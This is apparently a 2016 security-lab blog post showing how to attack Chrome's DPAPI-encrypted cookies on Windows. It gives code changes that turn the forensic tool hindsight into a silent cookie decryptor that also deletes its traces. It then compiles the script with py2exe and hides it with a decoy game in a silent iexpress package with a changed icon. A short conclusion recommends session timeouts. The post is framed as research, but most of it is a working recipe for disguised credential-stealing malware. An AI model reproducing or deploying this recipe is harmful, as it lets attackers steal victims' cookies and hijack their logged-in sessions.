SBM Labs

Cyber Security Collaboration Project

Attacking encrypted Google Chrome cookies
29 Jul 2016

As you may know, Google Chrome encrypts its cookies on disk. On Windows the encryption relies on the Windows Crypto API (DPAPI, CryptProtectData/CryptUnprotectData), which derives the protection key from the logon credentials of the current user session. This design needs no extra prompt to the user, but it has a weakness: any code that runs in the same user session can call the same API and get the plaintext back. Let's simulate an attack on Chrome cookies.

1. Download and install software.

We will use the hindsight utility. This tool was developed for forensic analysis of Google Chrome/Chromium profiles and is able to decrypt cookies.

We also need to install Python, Python for Windows Extensions (pywin32) and py2exe.

2. Modify script hindsight.py.

Set the input and output configuration. The -i argument is made optional because the input path is hard-coded below; the output is a timestamped file in the same profile directory.

# SBM Labs - Custom configuration
# original line kept for reference; -i is no longer required
#parser.add_argument('-i', '--input', help='Path to the Chrome(ium) "Default" directory', required=True)
parser.add_argument('-i', '--input', help='Path to the Chrome(ium) "Default" directory', required=False)

# SBM Labs - Custom configuration
# hard-code the current user's Default profile as input and a timestamped
# output file next to it (needs "import os" and "import time" at the top of hindsight.py)
profile_dir = os.path.join(os.path.expandvars("%userprofile%"), "AppData\\Local\\Google\\Chrome\\User Data\\Default\\")
args.input = profile_dir
args.output = os.path.join(profile_dir, "decrypted_cookies_{timestamp}".format(timestamp=time.strftime('%Y-%m-%dT%H-%M-%S')))
args.mode = "overwrite"

Create copies of the databases so that the cookies can be analysed even while the browser is running (Chrome keeps the SQLite files open and locked, so the live file cannot be opened directly).

# SBM Labs - Custom configuration
import shutil   # needed for copy2; place it with the other imports at the top of hindsight.py

# SBM Labs - Custom configuration
# work on a copy of each database instead of the live, locked file
# database_path = os.path.join(path, database)
temp_database = "temp_" + database
shutil.copy2(os.path.join(path, database), os.path.join(path, temp_database))
database_path = os.path.join(path, temp_database)

Delete tracks: remove the temporary copies once processing is finished.

# SBM Labs - Custom configuration
# remove only the temp_ copies created above; a bare search for "temp"
# would also match unrelated files in the profile directory
for f in os.listdir(args.input):
    if f.startswith("temp_"):
        os.remove(os.path.join(args.input, f))

Optionally you can add further actions to the script, for example copying the decrypted cookies to a remote host. That is out of our scope.

3. Test script hindsight.py.

Check the Chrome cookies in the browser.

Run the script.

Check the results.

4. Convert script hindsight.py to executable file.

Create a configuration file setup.py that converts the script into a single executable file.

from distutils.core import setup
import py2exe  # registers the "py2exe" command with distutils

setup(
    console=[r'C:\*****\*****\hindsight-master\hindsight.py'],  # path to the modified script (redacted)
    options={'py2exe': {'bundle_files': 1}},  # 1 = bundle everything, including the Python DLL, into the exe
    zipfile=None,  # keep the library inside the exe instead of a separate library.zip
)

Run the conversion. The executable is written to the dist directory.

C:\Python27>python.exe setup.py py2exe

Check the results.

5. Prepare malicious package.

We need an application that the victim will want to run, for example a "Tetris" game. Then we are ready to create a self-extracting package. We will use iexpress, which ships with Windows.

Below we look at the options that are interesting to an attacker. First we add our two applications to the package.

Set the install program to our converted script and the post-install command to the game, so the game starts after the cookies have been dumped.

Set hidden mode.

Hide the file extraction process.

6. Change package icon.

You can use the Resource Hacker tool to change the icon.

Check the results.

7. Conclusions.

So an attacker can prepare a malicious package, send it to the victim and steal the cookies despite their encryption, then use the victim's still-valid sessions to access various applications. That is why financial and other critical applications must implement session expiration, idle timeouts and similar controls. I recommend reading the Session Management Cheat Sheet from OWASP.

Transparent cookie encryption is useful against direct attacks on the cookies file, for example copying it from a disk image or from another account. But it does not provide a high level of protection, because any code running in the user's session can decrypt it without a prompt. A more secure approach would be to require an additional password or secret key from the user in order to decrypt the data, but that is not user-friendly.